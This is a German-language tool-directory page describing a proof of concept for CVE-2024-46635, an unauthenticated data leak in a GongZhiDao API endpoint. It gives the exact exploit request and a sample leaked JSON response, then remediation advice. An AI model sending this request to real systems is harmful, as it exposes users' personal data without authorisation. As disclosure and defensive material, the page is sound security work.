Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46635 — Proof-of-Concept für CVE-2024-46635: eine unsachgemäße Eingabevalidierungsschwachstelle im API-Endpunkt des GongZhiDao-Systems, die sensible Benutzerinformationen ohne Authentifizierung preisgibt. | Kitploit
Tools/GitHubGitHub/h1thub/cve-2024-46635
SchwachstellenanalyseInformationsbeschaffungWebsicherheitPenetrationstestsFehlkonfigurationAPI-Sicherheit
GitHubh1thub/cve-2024-46635

CVE-2024-46635

Proof-of-Concept für CVE-2024-46635: eine unsachgemäße Eingabevalidierungsschwachstelle im API-Endpunkt des GongZhiDao-Systems, die sensible Benutzerinformationen ohne Authentifizierung preisgibt.

Repository anzeigen
13vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46635

Hintergrund

Das GongZhiDao System ist eine von GongZhiDao entwickelte Plattform. Es bietet Unternehmenslösungen, darunter Benutzerverwaltung, Datenanalyse und Betriebsfunktionen. Allerdings wurde eine Sicherheitslücke in einem der API-Endpunkte entdeckt, die potenziell zur Offenlegung sensibler Benutzerinformationen ohne ordnungsgemäße Autorisierung führen könnte.

Beschreibung der Sicherheitslücke

In dem API-Endpunkt /oaa/api/AccountMaster/GetCurrentUserInfo des GongZhiDao Systems besteht eine Sicherheitslücke. Durch die Übergabe von %20 (einem URL-codierten Leerzeichen) anstelle des Parameters UserNameOrPhoneNumber antwortet die API mit sensiblen Benutzerinformationen, einschließlich Kontonummer, Benutzername und E-Mail-Adresse, selbst ohne ordnungsgemäße Authentifizierung oder Autorisierung. Diese unsachgemäße Eingabevalidierung ermöglicht es Angreifern, unbefugten Zugriff auf sensible Daten zu erlangen.

Auswirkungen

Eine erfolgreiche Ausnutzung dieser Sicherheitslücke könnte zur Offenlegung sensibler Benutzerdaten führen, einschließlich:

  • Kontonummer (Account-ID)
  • Benutzername
  • E-Mail-Adresse
  • Telefonnummer (falls vorhanden)
  • Andere persönliche Informationen
  • Ein Angreifer könnte diese Informationen nutzen, um weitere Angriffe wie Identitätsdiebstahl oder Phishing durchzuführen.

    Angriffsvektor

    Um die Sicherheitslücke auszunutzen, muss ein Angreifer eine manipulierte HTTP-GET-Anfrage an den anfälligen API-Endpunkt senden:

    root@kitploit:~
    GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2
    

    Diese Anfrage gibt eine 200-OK-Antwort mit sensiblen Benutzerdaten im JSON-Format zurück:

    root@kitploit:~
    HTTP/2 200 OK
    Date: Tue, 10 Sep 2024 03:25:09 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 153
    Server: nginx/1.22.0
    X-Powered-By: ASP.NET
    Set-Cookie: Path=/; HttpOnly; Secure
    
    {"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}
    

    Technische Details

    • Betroffener Endpunkt: /oaa/api/AccountMaster/GetCurrentUserInfo
    • Methode: HTTP GET
    • Parameter: UserNameOrPhoneNumber mit %20 als Eingabe
    • Antwort: Die API gibt sensible Benutzerdaten im JSON-Format ohne ordnungsgemäße Eingabevalidierung oder Autorisierung zurück.
    • Anfälligkeitstyp: Unsachgemäße Eingabevalidierung / Offenlegung sensibler Informationen

    Empfehlungen zur Behebung

    1. Implementieren Sie eine ordnungsgemäße Eingabevalidierung: Stellen Sie sicher, dass der Parameter UserNameOrPhoneNumber ordnungsgemäß bereinigt und validiert wird. Eingaben wie %20 sollten zurückgewiesen werden.

    2. Autorisierungsprüfungen: Implementieren Sie ordnungsgemäße Autorisierungsmechanismen, um sicherzustellen, dass nur authentifizierte und autorisierte Benutzer auf sensible Informationen zugreifen können.

    3. Ratenbegrenzung und Überwachung: Wenden Sie Ratenbegrenzung auf API-Endpunkte an, um Brute-Force- oder automatisierte Angriffe zu verhindern, und überwachen Sie die API-Aktivität auf abnormale Zugriffsmuster.

    Danksagungen

    Diese Sicherheitslücke wurde von hithub entdeckt.

    Referenzen

    • CWE-20: Unsachgemäße Eingabevalidierung
    Tool herunterladen